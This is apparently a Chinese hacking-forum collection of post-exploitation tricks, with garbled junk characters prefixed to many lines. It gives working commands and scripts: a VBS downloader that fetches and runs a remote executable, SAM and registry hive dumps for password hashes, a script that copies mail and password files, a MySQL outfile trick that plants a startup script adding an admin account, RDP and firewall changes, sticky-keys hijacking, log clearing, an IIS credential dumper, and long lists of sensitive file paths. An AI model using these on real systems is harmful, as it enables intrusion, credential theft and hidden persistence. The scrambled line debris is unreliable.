$ b+ ]" E4 j; ?! u) c3 L5 H6 K$ j* [argp@julius ~]$ sysctl vfs.usermount
8 P. `, g" {  u5 f+ N* vfs.usermount: 1
* [argp@julius ~]$ id
1 o1 T: e: h& E1 w) f3 S. c* uid=1001(argp) gid=1001(argp) groups=1001(argp)
* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
* [argp@julius ~]$ ./nfs_mount_ex
*
calling nmount()

2 V8 q' F9 Q2 ?3 v& B: W（注：本文原件由0x童鞋收集整理，感谢0x童鞋，本人补充和优化了点，本文毫无逻辑可言，因为是想到什么就写了，大家见谅）
  t8 r: i, F) i3 ?1 g5 G' y——————————————
- I4 s7 b. \' u- {. x; k2 c; c& s2 w- l感谢T00LS的童鞋们踊跃交流，让我学到许多经验，为了方便其他童鞋浏览，将T00LS的童鞋们补充的贴在下面，同时我也会以后将自己的一些想法跟新在后面。
————————————————————————————
) G; D! N4 w- X( g# Q3 h1、tar打包            tar -cvf /home/public_html/*.tar /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
4 q  U/ h0 {( Xalzip打包(韩国) alzip -a D:\WEB\ d:\web\*.rar
{
. W0 i( \) [, h1 p  c$ C注：
. ~, h1 q  d: \% L) G6 G5 B关于tar的打包方式,linux不以扩展名来决定文件类型。
若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压
那么用这条比较好 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
- `  l) q% v& @3 X: x}  

1 N. t0 m- c! k提权先执行systeminfo
token 漏洞补丁号 KB956572
, T" W: e! \+ ]7 ?" R5 SChurrasco          kb952004
命令行RAR打包~~·
rar a -k -r -s -m3 c:\1.rar c:\folder
——————————————
3 m, F# J) Q- @. b2、收集系统信息的脚本  
6 d8 Q1 ?& Z, q& Wfor window：

/ s# P  Y7 e6 Y1 _@echo off
echo #########system info collection
systeminfo
ver
hostname
" B' q: M  c( [, x% d, C! onet user
net localgroup
( d! D* Y+ v$ y2 J  t" Dnet localgroup administrators
net user guest
  L2 e7 K3 a. z: D" ^: @. Fnet user administrator

echo #######at- with   atq#####
echo schtask /query
( G- K6 ^; |- U" d1 U
) M5 k8 f$ D+ p3 D+ j' ^echo
" |! m6 E6 E+ y1 Vecho ####task-list#############
, Z" E5 z1 F$ S, V# X8 Htasklist /svc
& S+ t& W. b2 ]( i& |# Qecho
' l! d2 f! |# decho ####net-work infomation
0 V# @0 r8 W2 c" ]$ q) m( bipconfig/all
route print
1 [4 I* b( ]! Y- @3 o' Z* H$ Narp -a
8 b& p: h, M" T* qnetstat -anipconfig /displaydns
echo
( r, l: q4 M% S7 ^5 |echo #######service############
sc query type= service state= all
echo #######file-##############
cd \
tree -F
: Y1 X6 F1 k. O- Sfor linux：
% y0 b0 W  O! N, m: _" H
- ^0 J: _& q. q$ }" y#!/bin/bash
, M% }7 u# G3 t$ B
echo #######geting sysinfo####
, c2 Y" L3 O& s& l0 B& Necho ######usage: ./getinfo.sh >/tmp/sysinfo.txt
echo #######basic infomation##
0 t7 B# o( O) B' K: {% bcat /proc/meminfo
echo
cat /proc/cpuinfo
echo
rpm -qa 2>/dev/null
######stole the mail......######
3 @' M* |8 s' z$ s; _. Ocp -a /var/mail /tmp/getmail 2>/dev/null

# A, U" Q3 z# {' y$ R
echo 'u'r id is' `id`
echo ###atq&crontab#####
atq
crontab -l
8 X& Q0 z6 P) W) Z7 e  \! Lecho #####about var#####
/ r! D# k) R& yset

* H. k' ]5 T/ V  p- A( J5 E3 H4 `echo #####about network###
####this is then point in pentest,but i am a new bird,so u need to add some in it
- t; p6 `  O: j6 ~1 l% Fcat /etc/hosts
' n# a1 @& y$ K) e9 y9 Uhostname
* o: J, D, @; Y/ Aipconfig -a
arp -v
echo ########user####
4 K$ S; ?0 @0 x; @" j% lcat /etc/passwd|grep -i sh

  m" y4 {* u( ^7 c- x/ d$ secho ######service####
chkconfig --list

for i in {oracle,mysql,tomcat,samba,apache,ftp}
" r& O* t6 c+ k1 w% icat /etc/passwd|grep -i $i
6 r9 A7 i( ~6 k/ vdone

# c! q6 R6 Y: L  M/ G2 w( u9 ilocate passwd >/tmp/password 2>/dev/null
sleep 5
8 S. ]7 I; m4 _$ Rlocate password >>/tmp/password 2>/dev/null
! n2 n: j, H! U8 P* G3 G' H. }4 Hsleep 5
; n3 T" `& G! J: C$ B$ i  M- Zlocate conf >/tmp/sysconfig 2>dev/null
/ _4 @6 _$ R6 `+ _' T2 A& G  v, vsleep 5
locate config >>/tmp/sysconfig 2>/dev/null
sleep 5

: N1 F) ^3 l4 s9 M. i& \( {###maybe can use "tree /"###
7 U" T) L, V) r! w9 l$ J( }echo ##packing up#########
3 ?) e* G# i0 W" I& p$ C% H- O5 U0 qtar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
3 A7 Z. v  {( [rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
# R: C6 \  V( y9 ^% R——————————————
* }8 {5 }% Z+ _4 q3、ethash 不免杀怎么获取本机hash。
首先导出注册表 regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"   （2000）
               reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg  （2003）
' k4 [3 u3 _+ f  N. A( c注意权限问题，一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问（界面登录的需要注意，system权限可以忽略）
( c% M% p" `* {4 _接下来就简单了，把导出的注册表，down 到本机，修改注册表头导入本机，然后用抓去hash的工具抓本地用户就OK了
" J% b- ~; B  R2 hhash 抓完了记得把自己的账户密码改过来哦！
据我所知，某人是用这个方法虚拟机多次因为不知道密码而进不去！~
——————————————
. Z5 ~, }7 v) H( C8 R$ @9 P4、vbs 下载者
1
$ I6 T9 D8 e" y9 y3 g9 ?  uecho Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
echo sGet.Type = 1 >>c:\windows\cftmon.vbs
echo sGet.Open() >>c:\windows\cftmon.vbs
6 y! u* t1 n0 M# A/ r% p4 B0 kecho sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
2 N/ G2 }. E# s5 d2 v& decho sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
! a, x$ ^# V" i& ~. Xecho objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
cftmon.vbs
# z/ h4 h" v0 `, T8 T% [
2
4 \* D; L! k1 k% D# p7 LOn Error Resume Nextim iRemote,iLocal,s1,s2
0 q8 _) ^! q: s) V2 g/ a; r! }iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))  
: p$ J, A) l3 j* G) ?s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
% h* c1 H, B' z" J" ~- |  _" DSet sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
- ^1 U1 g+ g) I0 VsGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2
7 V# P" U! R. @. J, J( y9 D9 f0 [* G
cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe

当GetHashes获取不到hash时，可以用兵刃把sam复制到桌面
——————————————————
5、
) R4 G" B2 q8 w4 \1 d1.查询终端端口
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2.开启XP&2003终端服务
$ d$ _$ J' L8 o% W# @1 _( U9 IREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3.更改终端端口为2008(0x7d8)
" ^& ]# b  g0 r9 Y$ [# \REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
/ x5 z! C6 c9 M2 HREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
. {! K  G& x5 D) h' g; ]+ _4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled   xpsp2res.dll,-22009 /f
————————————————
6、create table a (cmd text);
2 b+ a% f  A3 g5 Z" d2 Hinsert into a values ("set wshshell=createobject (""wscript.shell"")");
insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");  
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
, n0 ~0 M. O8 S. w$ J& K) S# p————————————————————
/ I9 t$ P1 E* q9 _+ n! V3 Q  E, z4 U7、BS马的PortMap功能，类似LCX做转发。若果支持ASPX，用这个转发会隐蔽点。（注：一直忽略了在偏僻角落的那个功能）
+ c% l" X- g4 B8 b_____
8、for /d %i in (d:\freehost\*) do @echo %i
+ e- O% ^* w0 r
. T) j4 c8 C5 C; J" A% w列出d的所有目录
  
6 z( g. M9 m) _  for /d %i in (???) do @echo %i

把当前路径下文件夹的名字只有1-3个字母的打出来
$ s% p: F+ a% w( K5 b* O
; b+ o& f. K2 E& u) h) L4 n5 }7 b2.for /r %i in (*.exe) do @echo %i
  
以当前目录为搜索路径.会把目录与下面的子目录的全部EXE文件列出
1 k0 f3 F$ D; _5 j
for /r f:\freehost\hmadesign\web\ %i in (*.*) do @echo %i
9 c4 B) i% t7 J9 o9 ]2 T
3.for /f %i in (c:\1.txt) do echo %i
  
  //这个会显示a.txt里面的内容，因为/f的作用，会读出a.txt中

' [5 V4 X! s1 n5 k$ r( }4.for /f "tokens=2 delims= " %i in (a.txt) do echo %i

  delims=后的空格是分隔符 tokens是取第几个位置
——————————
  c& p8 F2 r7 k5 `/ M9 _: A% n●注册表:
! e8 ?6 w+ N" F0 R* D0 t$ C1.Administrator注册表备份:
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1f4.reg

2.修改3389的默认端口:
( j/ A) G; L% X8 J% K7 ^HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
% E& u8 }4 n: A' Z3 F修改PortNumber.
3 s0 k; L% I& L9 D( {1 E" e
, e9 @: m0 O4 J/ R6 _3.清除3389登录记录:
5 u) O; R6 G- Yreg delete "HKCU\Software\Microsoft\Terminal Server Client"  /f
' w' S/ M- H) \+ Q$ C: O5 b- h
  `7 y% k1 ?5 F" S1 R4.Radmin密码:
6 C+ B9 B( C5 [% [& Lreg export HKLM\SYSTEM\RAdmin c:\a.reg

5.禁用TCP/IP端口筛选(需重启):
7 J4 |7 \% p* \  PREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

" Y) _: l: T7 x% l6.IPSec默认免除项88端口(需重启):
reg add HKLM\SYSTEM\CurrentControlSet\Services\IPSEC /v NoDefaultExempt /t REG_DWORD /d 0 /f
或者
' Q& N0 R  {$ Onetsh ipsec dynamic set config ipsecexempt value=0

7.停止指派策略"myipsec":
netsh ipsec static set policy name="myipsec" assign=n

# L$ O1 R, l4 {; I4 I8.系统口令恢复LM加密:
% ]# A+ K/ Y" K& Y+ y, }" V8 ~reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LMCompatibilityLevel /t REG_DWORD /d 0 /f

9.另类方法抓系统密码HASH
, P  \0 ]( B* R7 ]. k$ I0 l. Hreg save hklm\sam c:\sam.hive
. s0 I2 f0 I& [% `' ^  E4 d$ Hreg save hklm\system c:\system.hive
reg save hklm\security c:\security.hive

10.shift映像劫持
) u1 ?! G# M  h+ U# o7 W2 U+ b. areg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d cmd.exe
! @- u9 ?# {; q( q$ Z- t
, |; l/ f1 E' J) Ureg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
-----------------------------------
$ w& v. s9 l3 f7 I' s2 @星外vbs(注：测试通过，好东西）
Set ObjService=GetObject("IIS://LocalHost/W3SVC")
% l) c9 ?* J7 `4 d8 k5 g- lFor Each obj3w In objservice
childObjectName=replace(obj3w.AdsPath,Left(obj3w.Adspath,22),"")
if IsNumeric(childObjectName)=true then
' [+ v9 {2 s+ _6 b9 Mset IIs=objservice.GetObject("IIsWebServer",childObjectName)
2 b. `# w# Q8 l- Z4 T8 c) p* P! `if err.number<>0 then
5 t$ {) A! ~9 ~exit for
msgbox("error!")
wscript.quit
) e7 g1 A( t/ d. i8 V" G" Uend if
) G. X6 s) q9 Q; Iserverbindings=IIS.serverBindings
: y. P6 z6 ?3 I9 W: Q( D. O) ~: gServerComment=iis.servercomment
. m$ H8 C0 k$ L, ?& L+ a! {/ e" Uset IISweb=iis.getobject("IIsWebVirtualDir","Root")
user=iisweb.AnonymousUserName
pass=iisweb.AnonymousUserPass
# H3 ]% D& }: ]8 }+ Cpath=IIsWeb.path
: `, h8 k5 n4 tlist=list&servercomment&" "&user&" "&pass&" "&join(serverBindings,",")&" "&path& vbCrLf & vbCrLf
9 A# x- V, d! Hend if
Next
/ _9 ~: b* a* {- l- [wscript.echo list
  R( V# j/ o6 ]/ BSet ObjService=Nothing
wscript.echo "from : http://www.xxx.com/" &vbTab&vbCrLf
WScript.Quit
, L) i, R3 X6 d* ~1 G6 l复制代码
----------------------2011新气象，欢迎各位补充、指正、优化。----------------
1、Firefox的利用(主要用于内网渗透），火狐浏览器的密码储存在C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\文件夹，打包后，本地查看。或有很多惊喜~
$ h0 _2 V7 \( F7 B2、win2k的htt提权（注：仅适合2k以及以下版本，文件夹不限,只读权限即可)
将folder.htt文件，加入以下代码：
# x6 q9 x; |' D. z  b, M' j* D8 [/ l<OBJECT ID=RUNIT WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="cmd.exe">
</OBJECT>
复制代码
然后与desktop.ini、cmd.exe同一个文件夹。当管理打开该文件夹时即可运行。
PS：我N年前在邪八讨论过XP下htt提权，由于N年前happy蠕虫的缘故，2K以后都没有folder.htt文件，但是xp下的htt自运行各位大牛给个力~
asp代码，利用的时候会出现登录问题
原因是ASP大马里有这样的代码：（没有就没事儿了）
1 Y: J6 r1 N6 h$ @6 O url=request.severvariables("url")
& [- V5 p1 b, L# E' R: n2 s6 g: Q 这里显示接收到的参数是通过URL来传递的，也就是说登录大马的时候服务器会解析b.asp，于是就出现了问题。
解决方法
url=request.severvariables("path_info")
2 c5 v  n1 H+ z( x  U9 c7 f path_info可以直接呈现虚拟路径 顺利解析gif大马

==============================================================
1 N. C: y( h1 M1 d1 }; I/ bLINUX常见路径：

/etc/passwd
; \/ ]" r/ D7 ^" ^( b9 A' v+ F/etc/shadow
/etc/fstab
: w! L( ^4 S" u# {  D/etc/host.conf
5 s% p, @- i. u1 ~+ h! y4 N/etc/motd
/etc/ld.so.conf
+ ]0 g# e' O8 V6 N; a* t/ C. q/var/www/htdocs/index.php
. I. B+ A" R- g. y8 B4 i. Z/var/www/conf/httpd.conf
/var/www/htdocs/index.html
/var/httpd/conf/php.ini
: {. J: J& E! U1 S. I/var/httpd/htdocs/index.php
/var/httpd/conf/httpd.conf
: F7 C  j/ I$ G5 g: Q/var/httpd/htdocs/index.html
* A3 E' A- Q+ |: S% R/var/httpd/conf/php.ini
/var/www/index.html
/var/www/index.php
; U$ w& y7 _$ I8 q/opt/www/conf/httpd.conf
/opt/www/htdocs/index.php
/opt/www/htdocs/index.html
/usr/local/apache/htdocs/index.html
/usr/local/apache/htdocs/index.php
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/htdocs/index.php
1 i  k, ?& I7 M9 ^/usr/local/httpd2.2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.html
/tmp/apache/htdocs/index.html
% a! e: i! p, u9 H+ m# `* ~% e/tmp/apache/htdocs/index.php
/etc/httpd/htdocs/index.php
/etc/httpd/conf/httpd.conf
/ g$ Y1 ^4 v8 A* O/etc/httpd/htdocs/index.html
/www/php/php.ini
% ^4 N4 s% S6 c& U/www/php4/php.ini
1 g* R% \  P7 c. n( z/www/php5/php.ini
9 o" I( _" Z3 g8 S1 _' ?0 Z+ n- M! @/www/conf/httpd.conf
/www/htdocs/index.php
/www/htdocs/index.html
$ Y! V& ~" K( R2 I2 V/usr/local/httpd/conf/httpd.conf
% G2 R9 Y1 ^; }' |& v; p6 ^/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
. w" n  O7 X; X6 i; o( L/etc/apache/apache.conf
/etc/apache2/apache.conf
# ^6 W5 U5 d6 G# |! p/ z1 T; h. h/etc/apache/httpd.conf
/etc/apache2/httpd.conf
: c! t! _% W, _- f- M0 V+ Q/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/apache2/sites-available/default
3 P0 v. \% ]7 O/etc/phpmyadmin/config.inc.php
. E3 Z# d3 H4 C/etc/mysql/my.cnf
* `+ u0 n9 J* K" `' r; O  @/etc/httpd/conf.d/php.conf
. H2 s' L) k) d: a4 C6 p/etc/httpd/conf.d/httpd.conf
/etc/httpd/logs/error_log
+ w5 h, }8 G- a& }! ?: q/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
% l+ r4 k. _  A8 I2 M# j1 I/etc/httpd/logs/access.log
/ ]& p2 g: `# W/home/apache/conf/httpd.conf
) i0 u1 E9 k+ f. X: u/home/apache2/conf/httpd.conf
. ]1 q' u8 g5 c) \/var/log/apache/error_log
9 z5 v  a6 p5 f' F9 A# }8 Y2 s3 {/var/log/apache/error.log
* `( C" P4 R; _3 v  }" R8 m* Z6 Y& P/var/log/apache/access_log
/var/log/apache/access.log
; V' B& z' P5 _# ?8 q/var/log/apache2/error_log
+ I% P# n/ h  }: i& G3 Y/var/log/apache2/error.log
/var/log/apache2/access_log
9 e" P/ d+ F; v! `- I$ w, }/var/log/apache2/access.log
1 R8 w6 H8 G7 h/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
) I8 \( Q! r6 {( e/usr/local/apache/logs/error_log
' E" W. j3 x8 @  |  S+ ?& v- |+ _& c1 J/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
/var/log/error.log
1 k- X) y) [, ~$ {, t- Z4 w/var/log/access_log
+ e8 c1 O5 r. d/var/log/access.log
/usr/local/apache/logs/access_logaccess_log.old
5 C! \5 w: ]7 z" B; \- x. p/usr/local/apache/logs/error_logerror_log.old
3 o) |( b4 N6 T* I/etc/php.ini
( [! q2 K6 d0 H; R) K4 C. u, L6 X/bin/php.ini
/etc/init.d/httpd
( A/ c* T4 [# t' D/etc/init.d/mysql
/etc/httpd/php.ini
/usr/lib/php.ini
! G+ h8 i0 Z% |6 {/usr/lib/php/php.ini
! J- L3 [7 n5 j, J" [( L/usr/local/etc/php.ini
/usr/local/lib/php.ini
/usr/local/php/lib/php.ini
  U0 y/ |8 x6 W6 t1 ^) X/usr/local/php4/lib/php.ini
/usr/local/php4/php.ini
. ?, F/ S- e% w% M( K: T# P/usr/local/php4/lib/php.ini
3 B# i' R; M4 b0 D: q/usr/local/php5/lib/php.ini
/usr/local/php5/etc/php.ini
- e. K! V; N1 p/usr/local/php5/php5.ini
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/php.ini
0 `/ D" X$ h1 b; @$ ^$ z/etc/php4.4/fcgi/php.ini
/ c2 ?- t4 t: N3 s0 B/etc/php4/apache/php.ini
3 E$ U9 e9 k3 `$ ?* l$ z/etc/php4/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
; Y6 [7 w, K& }6 @0 C* f, I, u/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/web/conf/php.ini
/usr/local/Zend/etc/php.ini
/opt/xampp/etc/php.ini
: a' O9 @3 ]! f. b; H/var/local/www/conf/php.ini
0 f& F+ F* t3 Q5 F! C/var/local/www/conf/httpd.conf
/etc/php/cgi/php.ini
! w1 p. B/ ~3 M3 }6 B( _/etc/php4/cgi/php.ini
$ @% T5 n3 @. P+ k. I) T; Q0 W/etc/php5/cgi/php.ini
/ T0 ]) K0 O9 E+ k% a/php5/php.ini
( D! g% c- d7 P5 Q/php4/php.ini
6 Q0 S) r$ O, t3 J4 c! k6 r7 g/php/php.ini
/PHP/php.ini
/apache/php/php.ini
/xampp/apache/bin/php.ini
* P. r3 v+ O" ?2 V! v1 D  ^/xampp/apache/conf/httpd.conf
  d7 g+ X; o" f" _8 d/NetServer/bin/stable/apache/php.ini
% D. V9 [7 c$ {+ k! y+ j/home2/bin/stable/apache/php.ini
# Z8 B+ z9 G, Y3 Z! a  [; ~" c3 ]. h/home/bin/stable/apache/php.ini
/var/log/mysql/mysql-bin.log
/var/log/mysql.log
) y$ Y' {% W" q7 P. c1 Y9 P3 r/var/log/mysqlderror.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
* ]/ W( J7 @: c. C# W8 \  z1 k. M/var/mysql.log
( @' G: j' }( W; @. n9 ?7 Z0 ~/var/lib/mysql/my.cnf
/usr/local/mysql/my.cnf
8 L+ m0 m1 q, R/ S- G4 s/usr/local/mysql/bin/mysql
) X9 `& H* [/ n9 Y$ i4 \/etc/mysql/my.cnf
/etc/my.cnf
, Y6 O% E. i7 s5 a/ X7 K# j/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
2 d$ V. j5 G! L( R- F8 r/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
5 a3 S* i# x1 {4 H" g5 U) F" u/usr/local/cpanel/logs/license_log
% \; ]9 c/ Y9 l: f7 d& ~2 I/ o" w/usr/local/cpanel/logs/login_log
+ [. O. W2 g6 O4 g+ Z1 X5 U4 K; x/usr/local/cpanel/logs/stats_log
5 T  {8 |8 z) f/usr/local/share/examples/php4/php.ini
/usr/local/share/examples/php/php.ini
4 Q& q+ c8 o7 y' q9 `
! ^3 k# ~7 C8 z5 ^$ w0 V; T; I$ J2..windows常见路径（可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘）
; R, r3 C5 y" d  I6 f( @/ P0 s3 S
c:\windows\php.ini
2 A+ `* f# ~& ^5 v9 G5 Qc:\boot.ini
7 Y3 J- J$ S$ K; H' Ic:\1.txt
  A1 B) U9 L  f. a! e- vc:\a.txt
2 s& h6 O- o& [! V
- q6 b! e. B' F) S; k' _c:\CMailServer\config.ini
c:\CMailServer\CMailServer.exe
2 h3 c& T$ N8 K6 W$ }c:\CMailServer\WebMail\index.asp
c:\program files\CMailServer\CMailServer.exe
, O. l, Z+ N9 b2 hc:\program files\CMailServer\WebMail\index.asp
C:\WinWebMail\SysInfo.ini
C:\WinWebMail\Web\default.asp
/ p5 m% d  J( QC:\WINDOWS\FreeHost32.dll
C:\WINDOWS\7i24iislog4.exe
: U" h, E$ }' t7 JC:\WINDOWS\7i24tool.exe
$ |& p  ~4 g: n3 E
c:\hzhost\databases\url.asp
0 K' [4 d% ~& N7 ~$ y' u
c:\hzhost\hzclient.exe
' a) k& G- m3 Y. n1 \. x8 u9 ~C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk
, Q3 v; I6 _4 M% U
C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk
/ J' B) u' X, j1 t- O  gC:\WINDOWS\web.config
" ^$ d; Q. g0 [0 _' Pc:\web\index.html
, o) t4 i( c0 P/ F6 k! oc:\www\index.html
c:\WWWROOT\index.html
( |' n" r- \$ S8 F' `! q- qc:\website\index.html
c:\web\index.asp
c:\www\index.asp
c:\wwwsite\index.asp
5 z* }& S& p# D; a: F6 b+ X& ^" Xc:\WWWROOT\index.asp
$ x0 H7 T2 \6 Z! J' `" I" gc:\web\index.php
c:\www\index.php
c:\WWWROOT\index.php
c:\WWWsite\index.php
c:\web\default.html
c:\www\default.html
/ a$ T6 c( q: ?# F, e" jc:\WWWROOT\default.html
c:\website\default.html
c:\web\default.asp
c:\www\default.asp
c:\wwwsite\default.asp
c:\WWWROOT\default.asp
7 M, Z( p" U6 ]3 k4 @c:\web\default.php
c:\www\default.php
c:\WWWROOT\default.php
: D4 w! {/ ]& h  u/ S# Lc:\WWWsite\default.php
* q) R2 d/ Z) _6 x, G' x9 q( fC:\Inetpub\wwwroot\pagerror.gif
' w1 N0 i( R# @c:\windows\notepad.exe
c:\winnt\notepad.exe
0 E" E. ^7 ?$ s! f% S0 GC:\Program Files\Microsoft Office\OFFICE10\winword.exe
C:\Program Files\Microsoft Office\OFFICE11\winword.exe
2 E- ~' N$ R/ M: R( jC:\Program Files\Microsoft Office\OFFICE12\winword.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
5 t, n& W- y; `8 `7 J9 n% gC:\Program Files\winrar\rar.exe
C:\Program Files\360\360Safe\360safe.exe
' U, ?' X% i! w7 VC:\Program Files\360Safe\360safe.exe
6 r* g$ |' b7 }  D. i; Q3 @C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log
' }8 M  l7 ?* x* Oc:\ravbin\store.ini
' V" f" ~; G/ s4 Cc:\rising.ini
C:\Program Files\Rising\Rav\RsTask.xml
C:\Documents and Settings\All Users\Start Menu\desktop.ini
C:\Documents and Settings\Administrator\My Documents\Default.rdp
C:\Documents and Settings\Administrator\Cookies\index.dat
% h: B5 v. E8 Y3 N# t$ ~; GC:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt
C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt
' m4 V( y( w! ^% s# Q" d" cC:\Documents and Settings\Administrator\My Documents\1.txt
C:\Documents and Settings\Administrator\桌面\1.txt
. i5 f) r$ y; C  B/ h+ kC:\Documents and Settings\Administrator\My Documents\a.txt
C:\Documents and Settings\Administrator\桌面\a.txt
% Z$ x" Q, f  eC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
E:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm
C:\Program Files\RhinoSoft.com\Serv-U\Version.txt
C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
C:\Program Files\Symantec\SYMEVENT.INF
& |- @5 X3 d$ h: s( s4 ]$ ?C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
/ ~. P& H3 u6 U* J0 n4 e& oC:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm
C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT
C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
5 y- g) d0 q1 Y# _1 O9 E; e) tC:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
, o! b! X- R. Y- e' c$ t& |C:\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
. }7 N2 b7 O. Q2 |/ W5 m, R8 IC:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm
" V  E/ W4 i+ a& S' [C:\Program Files\MySQL\MySQL Server 5.0\COPYING
( ?: l( @" X$ [8 uC:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
# h' o# l& @) r+ L5 ec:\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\data\mysql\user.frm
C:\Program Files\Oracle\oraconfig\Lpk.dll
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
0 x) A! \* ^5 x+ uC:\WINDOWS\system32\inetsrv\w3wp.exe
  ^0 [* ^; Z0 }: \C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\WINDOWS\system32\inetsrv\MetaBase.xml
5 E( y- J2 ^" B( j* R) n& F4 \6 x! eC:\WINDOWS\system32\inetsrv\iisadmpwd\achg.asp
C:\WINDOWS\system32\config\default.LOG
C:\WINDOWS\system32\config\sam
$ r9 b6 R5 y- Q: ~7 mC:\WINDOWS\system32\config\system
c:\CMailServer\config.ini
8 G$ |5 \, ^3 @' vc:\program files\CMailServer\config.ini
  q4 \( ?9 c( @c:\tomcat6\tomcat6\bin\version.sh
9 Z) L4 h" \) o+ ^( m0 q5 gc:\tomcat6\bin\version.sh
8 z4 v- Y# L! u5 k9 cc:\tomcat\bin\version.sh
2 p" N* `( ^4 H- d  S5 V0 vc:\program files\tomcat6\bin\version.sh
2 S* j+ V4 T) @5 I7 o0 L! y2 BC:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh
